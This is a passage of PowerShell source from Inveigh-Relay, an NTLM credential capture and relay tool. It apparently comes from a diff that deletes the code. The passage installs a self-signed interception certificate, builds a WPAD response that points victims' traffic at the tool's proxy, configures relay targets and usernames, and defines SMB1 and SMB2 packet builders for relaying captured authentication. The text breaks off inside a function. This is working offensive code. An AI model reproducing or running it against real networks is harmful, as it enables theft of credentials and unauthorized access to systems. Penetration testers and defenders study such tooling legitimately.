- $inveigh.status_queue.Add("HTTPS Certificate CN = " + $inveigh.certificate_CN) > $null
- $certificate_check = (Get-ChildItem Cert:\LocalMachine\My | Where-Object {$_.Issuer -match $inveigh.certificate_issuer})
-
- if(!$certificate_check)
- {
- # credit to subTee for cert creation code https://github.com/subTee/Interceptor
- $certificate_distinguished_name = new-object -com "X509Enrollment.CX500DistinguishedName"
- $certificate_distinguished_name.Encode( "CN=" + $inveigh.certificate_CN, $certificate_distinguished_name.X500NameFlags.X500NameFlags.XCN_CERT_NAME_STR_NONE)
- $certificate_issuer_distinguished_name = new-object -com "X509Enrollment.CX500DistinguishedName"
- $certificate_issuer_distinguished_name.Encode("CN=" + $inveigh.certificate_issuer, $certificate_distinguished_name.X500NameFlags.X500NameFlags.XCN_CERT_NAME_STR_NONE)
- $certificate_key = new-object -com "X509Enrollment.CX509PrivateKey"
- $certificate_key.ProviderName = "Microsoft Enhanced RSA and AES Cryptographic Provider"
- $certificate_key.KeySpec = 2
- $certificate_key.Length = 2048
- $certificate_key.MachineContext = 1
- $certificate_key.Create()
- $certificate_server_auth_OID = new-object -com "X509Enrollment.CObjectId"
- $certificate_server_auth_OID.InitializeFromValue("1.3.6.1.5.5.7.3.1")
- $certificate_enhanced_key_usage_OID = new-object -com "X509Enrollment.CObjectIds.1"
- $certificate_enhanced_key_usage_OID.add($certificate_server_auth_OID)
- $certificate_enhanced_key_usage_extension = new-object -com "X509Enrollment.CX509ExtensionEnhancedKeyUsage"
- $certificate_enhanced_key_usage_extension.InitializeEncode($certificate_enhanced_key_usage_OID)
- $certificate = new-object -com "X509Enrollment.CX509CertificateRequestCertificate"
- $certificate.InitializeFromPrivateKey(2,$certificate_key,"")
- $certificate.Subject = $certificate_distinguished_name
- $certificate.Issuer = $certificate_issuer_distinguished_name
- $certificate.NotBefore = (get-date).AddDays(-271)
- $certificate.NotAfter = $certificate.NotBefore.AddDays(824)
- $certificate_hash_algorithm_OID = New-Object -ComObject X509Enrollment.CObjectId
- $certificate_hash_algorithm_OID.InitializeFromAlgorithmName(1,0,0,"SHA256")
- $certificate.HashAlgorithm = $certificate_hash_algorithm_OID
- $certificate.X509Extensions.Add($certificate_enhanced_key_usage_extension)
- $certificate_basic_constraints = new-object -com "X509Enrollment.CX509ExtensionBasicConstraints"
- $certificate_basic_constraints.InitializeEncode("true",1)
- $certificate.X509Extensions.Add($certificate_basic_constraints)
- $certificate.Encode()
- $certificate_enrollment = new-object -com "X509Enrollment.CX509Enrollment"
- $certificate_enrollment.InitializeFromRequest($certificate)
- $certificate_data = $certificate_enrollment.CreateRequest(0)
- $certificate_enrollment.InstallResponse(2,$certificate_data,0,"")
- $inveigh.certificate = (Get-ChildItem Cert:\LocalMachine\My | Where-Object {$_.Issuer -match $inveigh.certificate_issuer})
- $inveigh.HTTPS = $true
- $inveigh.status_queue.Add("HTTPS Capture/Relay = Enabled") > $null
- }
- else
- {
-
- if($HTTPSForceCertDelete -eq 'Y')
- {
- $inveigh.HTTPS_force_certificate_delete = $true
- }
-
- $inveigh.HTTPS_existing_certificate = $true
- $inveigh.status_queue.Add("HTTPS Capture = Using Existing Certificate") > $null
- }
-
- }
- catch
- {
- $HTTPS = "N"
- $inveigh.HTTPS = $false
- $inveigh.status_queue.Add("HTTPS Capture/Relay Disabled Due To Certificate Error") > $null
- }
-
- }
-
-}
-else
-{
- $inveigh.status_queue.Add("HTTPS Capture/Relay = Disabled") > $null
-}
-
-if($HTTP -eq 'Y' -or $HTTPS -eq 'Y')
-{
-
- if($Challenge)
- {
- $inveigh.status_queue.Add("NTLM Challenge = $Challenge") > $null
- }
-
- if($MachineAccounts -eq 'N')
- {
- $inveigh.status_queue.Add("Machine Account Capture = Disabled") > $null
- $inveigh.machine_accounts = $false
- }
- else
- {
- $inveigh.machine_accounts = $true
- }
-
- $inveigh.status_queue.Add("WPAD Authentication = $WPADAuth") > $null
-
- if($WPADAuth -eq "NTLM")
- {
- $WPADAuthIgnore = ($WPADAuthIgnore | Where-Object {$_ -and $_.Trim()})
-
- if($WPADAuthIgnore.Count -gt 0)
- {
- $inveigh.status_queue.Add("WPAD NTLM Authentication Ignore List = " + ($WPADAuthIgnore -join ",")) > $null
- }
-
- }
-
- $HTTPResetDelay = ($HTTPResetDelay | Where-Object {$_ -and $_.Trim()})
-
- if($HTTPResetDelay.Count -gt 0)
- {
- $inveigh.status_queue.Add("HTTP Reset Delay List = " + ($HTTPResetDelay -join ",")) > $null
- $inveigh.status_queue.Add("HTTP Reset Delay Timeout = $HTTPResetDelayTimeout Seconds") > $null
- }
-
-}
-
-if($Proxy -eq 'Y')
-{
-
- if($proxy_port_check)
- {
- $HTTP = "N"
- $inveigh.status_queue.Add("Proxy Capture/Relay Disabled Due To In Use Port $ProxyPort") > $null
- }
- else
- {
- $inveigh.status_queue.Add("Proxy Capture/Relay = Enabled") > $null
- $inveigh.status_queue.Add("Proxy Port = $ProxyPort") > $null
- $ProxyPortFailover = $ProxyPort + 1
- $WPADResponse = "function FindProxyForURL(url,host){return `"PROXY $proxy_WPAD_IP`:$ProxyPort; PROXY $proxy_WPAD_IP`:$ProxyPortFailover; DIRECT`";}"
- $ProxyIgnore = ($ProxyIgnore | Where-Object {$_ -and $_.Trim()})
-
- if($ProxyIgnore.Count -gt 0)
- {
- $inveigh.status_queue.Add("Proxy Ignore List = " + ($ProxyIgnore -join ",")) > $null
- }
-
- }
-
-}
-
-$inveigh.status_queue.Add("Relay Target = $Target") > $null
-
-if($Usernames)
-{
-
- if($Usernames.Count -eq 1)
- {
- $inveigh.status_queue.Add("Relay Username = " + ($Usernames -join ",")) > $null
- }
- else
- {
- $inveigh.status_queue.Add("Relay Usernames = " + ($Usernames -join ",")) > $null
- }
-
-}
-
-if($RelayAutoDisable -eq 'Y')
-{
- $inveigh.status_queue.Add("Relay Auto Disable = Enabled") > $null
-}
-else
-{
- $inveigh.status_queue.Add("Relay Auto Disable = Disabled") > $null
-}
-
-if($RelayAutoExit -eq 'Y')
-{
- $inveigh.status_queue.Add("Relay Auto Exit = Enabled") > $null
-}
-else
-{
- $inveigh.status_queue.Add("Relay Auto Exit = Disabled") > $null
-}
-
-if($Service)
-{
- $inveigh.status_queue.Add("Relay Service = $Service") > $null
-}
-
-if($SMB1)
-{
- $inveigh.status_queue.Add("SMB Version = SMB1") > $null
- $SMB_version = 'SMB1'
-}
-
-if($ConsoleOutput -ne 'N')
-{
-
- if($ConsoleOutput -eq 'Y')
- {
- $inveigh.status_queue.Add("Real Time Console Output = Enabled") > $null
- }
- else
- {
- $inveigh.status_queue.Add("Real Time Console Output = $ConsoleOutput") > $null
- }
-
- $inveigh.console_output = $true
-
- if($ConsoleStatus -eq 1)
- {
- $inveigh.status_queue.Add("Console Status = $ConsoleStatus Minute") > $null
- }
- elseif($ConsoleStatus -gt 1)
- {
- $inveigh.status_queue.Add("Console Status = $ConsoleStatus Minutes") > $null
- }
-
-}
-else
-{
-
- if($inveigh.tool -eq 1)
- {
- $inveigh.status_queue.Add("Real Time Console Output Disabled Due To External Tool Selection") > $null
- }
- else
- {
- $inveigh.status_queue.Add("Real Time Console Output = Disabled") > $null
- }
-
-}
-
-if($ConsoleUnique -eq 'Y')
-{
- $inveigh.console_unique = $true
-}
-else
-{
- $inveigh.console_unique = $false
-}
-
-if($FileOutput -eq 'Y')
-{
- $inveigh.status_queue.Add("Real Time File Output = Enabled") > $null
- $inveigh.status_queue.Add("Output Directory = $output_directory") > $null
- $inveigh.file_output = $true
-}
-else
-{
- $inveigh.status_queue.Add("Real Time File Output = Disabled") > $null
-}
-
-if($RunTime -eq 1)
-{
- $inveigh.status_queue.Add("Run Time = $RunTime Minute") > $null
-}
-elseif($RunTime -gt 1)
-{
- $inveigh.status_queue.Add("Run Time = $RunTime Minutes") > $null
-}
-
-if($ShowHelp -eq 'Y')
-{
- $inveigh.status_queue.Add("Run Stop-Inveigh to stop Inveigh-Relay") > $null
-
- if($inveigh.console_output)
- {
- $inveigh.status_queue.Add("Press any key to stop real time console output") > $null
- }
-
-}
-
-if($inveigh.status_output)
-{
-
- while($inveigh.status_queue.Count -gt 0)
- {
-
- switch -Wildcard ($inveigh.status_queue[0])
- {
-
- {$_ -like "* Disabled Due To *" -or $_ -like "Run Stop-Inveigh to stop Inveigh-Relay" -or $_ -like "Windows Firewall = Enabled"}
- {
-
- if($inveigh.output_stream_only)
- {
- Write-Output($inveigh.status_queue[0] + $inveigh.newline)
- }
- else
- {
- Write-Warning($inveigh.status_queue[0])
- }
-
- $inveigh.status_queue.RemoveAt(0)
- }
-
- default
- {
-
- if($inveigh.output_stream_only)
- {
- Write-Output($inveigh.status_queue[0] + $inveigh.newline)
- }
- else
- {
- Write-Output($inveigh.status_queue[0])
- }
-
- $inveigh.status_queue.RemoveAt(0)
- }
-
- }
-
- }
-
-}
-
-$process_ID = [System.Diagnostics.Process]::GetCurrentProcess() | Select-Object -expand id
-$process_ID = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($process_ID))
-$process_ID = $process_ID -replace "-00-00",""
-[Byte[]]$inveigh.process_ID_bytes = $process_ID.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
-
-# Begin ScriptBlocks
-
-# Shared Basic Functions ScriptBlock
-$shared_basic_functions_scriptblock =
-{
-
- function DataLength2
- {
- param ([Int]$length_start,[Byte[]]$string_extract_data)
-
- $string_length = [System.BitConverter]::ToUInt16($string_extract_data[$length_start..($length_start + 1)],0)
- return $string_length
- }
-
- function DataLength4
- {
- param ([Int]$length_start,[Byte[]]$string_extract_data)
-
- $string_length = [System.BitConverter]::ToUInt32($string_extract_data[$length_start..($length_start + 3)],0)
- return $string_length
- }
-
- function DataToString
- {
- param ([Int]$string_start,[Int]$string_length,[Byte[]]$string_extract_data)
-
- $string_data = [System.BitConverter]::ToString($string_extract_data[$string_start..($string_start + $string_length - 1)])
- $string_data = $string_data -replace "-00",""
- $string_data = $string_data.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
- $string_extract = New-Object System.String ($string_data,0,$string_data.Length)
- return $string_extract
- }
-
-}
-
-# Irkin Functions ScriptBlock
-$irkin_functions_scriptblock =
-{
- function ConvertFrom-PacketOrderedDictionary
- {
- param($packet_ordered_dictionary)
-
- ForEach($field in $packet_ordered_dictionary.Values)
- {
- $byte_array += $field
- }
-
- return $byte_array
- }
-
- #NetBIOS
-
- function Get-PacketNetBIOSSessionService()
- {
- param([Int]$packet_header_length,[Int]$packet_data_length)
-
- [Byte[]]$packet_netbios_session_service_length = [System.BitConverter]::GetBytes($packet_header_length + $packet_data_length)
- $packet_NetBIOS_session_service_length = $packet_netbios_session_service_length[2..0]
-
- $packet_NetBIOSSessionService = New-Object System.Collections.Specialized.OrderedDictionary
- $packet_NetBIOSSessionService.Add("NetBIOSSessionService_Message_Type",[Byte[]](0x00))
- $packet_NetBIOSSessionService.Add("NetBIOSSessionService_Length",[Byte[]]($packet_netbios_session_service_length))
-
- return $packet_NetBIOSSessionService
- }
-
- #SMB1
-
- function Get-PacketSMBHeader()
- {
- param([Byte[]]$packet_command,[Byte[]]$packet_flags,[Byte[]]$packet_flags2,[Byte[]]$packet_tree_ID,[Byte[]]$packet_process_ID,[Byte[]]$packet_user_ID)
-
- $packet_SMBHeader = New-Object System.Collections.Specialized.OrderedDictionary
- $packet_SMBHeader.Add("SMBHeader_Protocol",[Byte[]](0xff,0x53,0x4d,0x42))
- $packet_SMBHeader.Add("SMBHeader_Command",$packet_command)
- $packet_SMBHeader.Add("SMBHeader_ErrorClass",[Byte[]](0x00))
- $packet_SMBHeader.Add("SMBHeader_Reserved",[Byte[]](0x00))
- $packet_SMBHeader.Add("SMBHeader_ErrorCode",[Byte[]](0x00,0x00))
- $packet_SMBHeader.Add("SMBHeader_Flags",$packet_flags)
- $packet_SMBHeader.Add("SMBHeader_Flags2",$packet_flags2)
- $packet_SMBHeader.Add("SMBHeader_ProcessIDHigh",[Byte[]](0x00,0x00))
- $packet_SMBHeader.Add("SMBHeader_Signature",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
- $packet_SMBHeader.Add("SMBHeader_Reserved2",[Byte[]](0x00,0x00))
- $packet_SMBHeader.Add("SMBHeader_TreeID",$packet_tree_ID)
- $packet_SMBHeader.Add("SMBHeader_ProcessID",$packet_process_ID)
- $packet_SMBHeader.Add("SMBHeader_UserID",$packet_user_ID)
- $packet_SMBHeader.Add("SMBHeader_MultiplexID",[Byte[]](0x00,0x00))
-
- return $packet_SMBHeader
- }
-
- function Get-PacketSMBNegotiateProtocolRequest()
- {
- param([String]$packet_version)
-
- if($packet_version -eq 'SMB1')
- {
- [Byte[]]$packet_byte_count = 0x0c,0x00
- }
- else
- {
- [Byte[]]$packet_byte_count = 0x22,0x00
- }
-
- $packet_SMBNegotiateProtocolRequest = New-Object System.Collections.Specialized.OrderedDictionary
- $packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_WordCount",[Byte[]](0x00))
- $packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_ByteCount",$packet_byte_count)
- $packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_RequestedDialects_Dialect_BufferFormat",[Byte[]](0x02))
- $packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_RequestedDialects_Dialect_Name",[Byte[]](0x4e,0x54,0x20,0x4c,0x4d,0x20,0x30,0x2e,0x31,0x32,0x00))
-
- if($packet_version -ne 'SMB1')
- {
- $packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_RequestedDialects_Dialect_BufferFormat2",[Byte[]](0x02))
- $packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_RequestedDialects_Dialect_Name2",[Byte[]](0x53,0x4d,0x42,0x20,0x32,0x2e,0x30,0x30,0x32,0x00))
- $packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_RequestedDialects_Dialect_BufferFormat3",[Byte[]](0x02))
- $packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_RequestedDialects_Dialect_Name3",[Byte[]](0x53,0x4d,0x42,0x20,0x32,0x2e,0x3f,0x3f,0x3f,0x00))
- }
-
- return $packet_SMBNegotiateProtocolRequest
- }
-
- function Get-PacketSMBSessionSetupAndXRequest()
- {
- param([Byte[]]$packet_security_blob)
-
- [Byte[]]$packet_byte_count = [System.BitConverter]::GetBytes($packet_security_blob.Length)
- $packet_byte_count = $packet_byte_count[0,1]
- [Byte[]]$packet_security_blob_length = [System.BitConverter]::GetBytes($packet_security_blob.Length + 5)
- $packet_security_blob_length = $packet_security_blob_length[0,1]
-
- $packet_SMBSessionSetupAndXRequest = New-Object System.Collections.Specialized.OrderedDictionary
- $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_WordCount",[Byte[]](0x0c))
- $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_AndXCommand",[Byte[]](0xff))
- $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_Reserved",[Byte[]](0x00))
- $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_AndXOffset",[Byte[]](0x00,0x00))
- $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_MaxBuffer",[Byte[]](0xff,0xff))
- $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_MaxMpxCount",[Byte[]](0x02,0x00))
- $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_VCNumber",[Byte[]](0x01,0x00))
- $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_SessionKey",[Byte[]](0x00,0x00,0x00,0x00))
- $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_SecurityBlobLength",$packet_byte_count)
- $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_Reserved2",[Byte[]](0x00,0x00,0x00,0x00))
- $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_Capabilities",[Byte[]](0x44,0x00,0x00,0x80))
- $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_ByteCount",$packet_security_blob_length)
- $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_SecurityBlob",$packet_security_blob)
- $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_NativeOS",[Byte[]](0x00,0x00,0x00))
- $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_NativeLANManage",[Byte[]](0x00,0x00))
-
- return $packet_SMBSessionSetupAndXRequest
- }
-
- function Get-PacketSMBTreeConnectAndXRequest()
- {
- param([Byte[]]$packet_path)
-
- [Byte[]]$packet_path_length = [System.BitConverter]::GetBytes($packet_path.Length + 7)
- $packet_path_length = $packet_path_length[0,1]
-
- $packet_SMBTreeConnectAndXRequest = New-Object System.Collections.Specialized.OrderedDictionary
- $packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_WordCount",[Byte[]](0x04))
- $packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_AndXCommand",[Byte[]](0xff))
- $packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_Reserved",[Byte[]](0x00))
- $packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_AndXOffset",[Byte[]](0x00,0x00))
- $packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_Flags",[Byte[]](0x00,0x00))
- $packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_PasswordLength",[Byte[]](0x01,0x00))
- $packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_ByteCount",$packet_path_length)
- $packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_Password",[Byte[]](0x00))
- $packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_Tree",$packet_path)
- $packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_Service",[Byte[]](0x3f,0x3f,0x3f,0x3f,0x3f,0x00))
-
- return $packet_SMBTreeConnectAndXRequest
- }
-
- function Get-PacketSMBNTCreateAndXRequest()
- {
- param([Byte[]]$packet_named_pipe)
-
- [Byte[]]$packet_named_pipe_length = [System.BitConverter]::GetBytes($packet_named_pipe.Length)
- $packet_named_pipe_length = $packet_named_pipe_length[0,1]
- [Byte[]]$packet_file_name_length = [System.BitConverter]::GetBytes($packet_named_pipe.Length - 1)
- $packet_file_name_length = $packet_file_name_length[0,1]
-
- $packet_SMBNTCreateAndXRequest = New-Object System.Collections.Specialized.OrderedDictionary
- $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_WordCount",[Byte[]](0x18))
- $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_AndXCommand",[Byte[]](0xff))
- $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_Reserved",[Byte[]](0x00))
- $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_AndXOffset",[Byte[]](0x00,0x00))
- $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_Reserved2",[Byte[]](0x00))
- $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_FileNameLen",$packet_file_name_length)
- $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_CreateFlags",[Byte[]](0x16,0x00,0x00,0x00))
- $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_RootFID",[Byte[]](0x00,0x00,0x00,0x00))
- $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_AccessMask",[Byte[]](0x00,0x00,0x00,0x02))
- $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_AllocationSize",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
- $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_FileAttributes",[Byte[]](0x00,0x00,0x00,0x00))
- $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_ShareAccess",[Byte[]](0x07,0x00,0x00,0x00))
- $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_Disposition",[Byte[]](0x01,0x00,0x00,0x00))
- $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_CreateOptions",[Byte[]](0x00,0x00,0x00,0x00))
- $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_Impersonation",[Byte[]](0x02,0x00,0x00,0x00))
- $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_SecurityFlags",[Byte[]](0x00))
- $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_ByteCount",$packet_named_pipe_length)
- $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_Filename",$packet_named_pipe)
-
- return $packet_SMBNTCreateAndXRequest
- }
-
- function Get-PacketSMBReadAndXRequest()
- {
- $packet_SMBReadAndXRequest = New-Object System.Collections.Specialized.OrderedDictionary
- $packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_WordCount",[Byte[]](0x0a))
- $packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_AndXCommand",[Byte[]](0xff))
- $packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_Reserved",[Byte[]](0x00))
- $packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_AndXOffset",[Byte[]](0x00,0x00))
- $packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_FID",[Byte[]](0x00,0x40))
- $packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_Offset",[Byte[]](0x00,0x00,0x00,0x00))
- $packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_MaxCountLow",[Byte[]](0x58,0x02))
- $packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_MinCount",[Byte[]](0x58,0x02))
- $packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_Unknown",[Byte[]](0xff,0xff,0xff,0xff))
- $packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_Remaining",[Byte[]](0x00,0x00))
- $packet_SMBReadAndXRequest.Add("SMBReadAndXRequest_ByteCount",[Byte[]](0x00,0x00))
-
- return $packet_SMBReadAndXRequest
- }
-
- function Get-PacketSMBWriteAndXRequest()
- {
- param([Byte[]]$packet_file_ID,[Int]$packet_RPC_length)
-
- [Byte[]]$packet_write_length = [System.BitConverter]::GetBytes($packet_RPC_length)
- $packet_write_length = $packet_write_length[0,1]
-
- $packet_SMBWriteAndXRequest = New-Object System.Collections.Specialized.OrderedDictionary
- $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_WordCount",[Byte[]](0x0e))
- $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_AndXCommand",[Byte[]](0xff))
- $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_Reserved",[Byte[]](0x00))
- $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_AndXOffset",[Byte[]](0x00,0x00))
- $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_FID",$packet_file_ID)
- $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_Offset",[Byte[]](0xea,0x03,0x00,0x00))
- $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_Reserved2",[Byte[]](0xff,0xff,0xff,0xff))
- $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_WriteMode",[Byte[]](0x08,0x00))
- $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_Remaining",$packet_write_length)
- $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_DataLengthHigh",[Byte[]](0x00,0x00))
- $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_DataLengthLow",$packet_write_length)
- $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_DataOffset",[Byte[]](0x3f,0x00))
- $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_HighOffset",[Byte[]](0x00,0x00,0x00,0x00))
- $packet_SMBWriteAndXRequest.Add("SMBWriteAndXRequest_ByteCount",$packet_write_length)
-
- return $packet_SMBWriteAndXRequest
- }
-
- function Get-PacketSMBCloseRequest()
- {
- param ([Byte[]]$packet_file_ID)
-
- $packet_SMBCloseRequest = New-Object System.Collections.Specialized.OrderedDictionary
- $packet_SMBCloseRequest.Add("SMBCloseRequest_WordCount",[Byte[]](0x03))
- $packet_SMBCloseRequest.Add("SMBCloseRequest_FID",$packet_file_ID)
- $packet_SMBCloseRequest.Add("SMBCloseRequest_LastWrite",[Byte[]](0xff,0xff,0xff,0xff))
- $packet_SMBCloseRequest.Add("SMBCloseRequest_ByteCount",[Byte[]](0x00,0x00))
-
- return $packet_SMBCloseRequest
- }
-
- function Get-PacketSMBTreeDisconnectRequest()
- {
- $packet_SMBTreeDisconnectRequest = New-Object System.Collections.Specialized.OrderedDictionary
- $packet_SMBTreeDisconnectRequest.Add("SMBTreeDisconnectRequest_WordCount",[Byte[]](0x00))
- $packet_SMBTreeDisconnectRequest.Add("SMBTreeDisconnectRequest_ByteCount",[Byte[]](0x00,0x00))
-
- return $packet_SMBTreeDisconnectRequest
- }
-
- function Get-PacketSMBLogoffAndXRequest()
- {
- $packet_SMBLogoffAndXRequest = New-Object System.Collections.Specialized.OrderedDictionary
- $packet_SMBLogoffAndXRequest.Add("SMBLogoffAndXRequest_WordCount",[Byte[]](0x02))
- $packet_SMBLogoffAndXRequest.Add("SMBLogoffAndXRequest_AndXCommand",[Byte[]](0xff))
- $packet_SMBLogoffAndXRequest.Add("SMBLogoffAndXRequest_Reserved",[Byte[]](0x00))
- $packet_SMBLogoffAndXRequest.Add("SMBLogoffAndXRequest_AndXOffset",[Byte[]](0x00,0x00))
- $packet_SMBLogoffAndXRequest.Add("SMBLogoffAndXRequest_ByteCount",[Byte[]](0x00,0x00))
-
- return $packet_SMBLogoffAndXRequest
- }
-
- #SMB2
-
- function Get-PacketSMB2Header()
- {
- param([Byte[]]$packet_command,[Int]$packet_message_ID,[Byte[]]$packet_tree_ID,[Byte[]]$packet_session_ID)
-
- [Byte[]]$packet_message_ID = [System.BitConverter]::GetBytes($packet_message_ID) + 0x00,0x00,0x00,0x00
-
- $packet_SMB2Header = New-Object System.Collections.Specialized.OrderedDictionary
- $packet_SMB2Header.Add("SMB2Header_ProtocolID",[Byte[]](0xfe,0x53,0x4d,0x42))
- $packet_SMB2Header.Add("SMB2Header_StructureSize",[Byte[]](0x40,0x00))
- $packet_SMB2Header.Add("SMB2Header_CreditCharge",[Byte[]](0x01,0x00))
- $packet_SMB2Header.Add("SMB2Header_ChannelSequence",[Byte[]](0x00,0x00))
- $packet_SMB2Header.Add("SMB2Header_Reserved",[Byte[]](0x00,0x00))
- $packet_SMB2Header.Add("SMB2Header_Command",$packet_command)
- $packet_SMB2Header.Add("SMB2Header_CreditRequest",[Byte[]](0x00,0x00))
- $packet_SMB2Header.Add("SMB2Header_Flags",[Byte[]](0x00,0x00,0x00,0x00))
- $packet_SMB2Header.Add("SMB2Header_NextCommand",[Byte[]](0x00,0x00,0x00,0x00))
- $packet_SMB2Header.Add("SMB2Header_MessageID",$packet_message_ID)
- $packet_SMB2Header.Add("SMB2Header_Reserved2",[Byte[]](0x00,0x00,0x00,0x00))
- $packet_SMB2Header.Add("SMB2Header_TreeID",$packet_tree_ID)
- $packet_SMB2Header.Add("SMB2Header_SessionID",$packet_session_ID)
- $packet_SMB2Header.Add("SMB2Header_Signature",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
-
- return $packet_SMB2Header
- }
-
- function Get-PacketSMB2NegotiateProtocolRequest()
- {
- $packet_SMB2NegotiateProtocolRequest = New-Object System.Collections.Specialized.OrderedDictionary
- $packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_StructureSize",[Byte[]](0x24,0x00))
- $packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_DialectCount",[Byte[]](0x02,0x00))
- $packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_SecurityMode",[Byte[]](0x01,0x00))
- $packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_Reserved",[Byte[]](0x00,0x00))
- $packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_Capabilities",[Byte[]](0x40,0x00,0x00,0x00))
- $packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_ClientGUID",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
- $packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_NegotiateContextOffset",[Byte[]](0x00,0x00,0x00,0x00))
- $packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_NegotiateContextCount",[Byte[]](0x00,0x00))
- $packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_Reserved2",[Byte[]](0x00,0x00))
- $packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_Dialect",[Byte[]](0x02,0x02))
- $packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_Dialect2",[Byte[]](0x10,0x02))
-
- return $packet_SMB2NegotiateProtocolRequest
- }
-
- function Get-PacketSMB2SessionSetupRequest()
- {
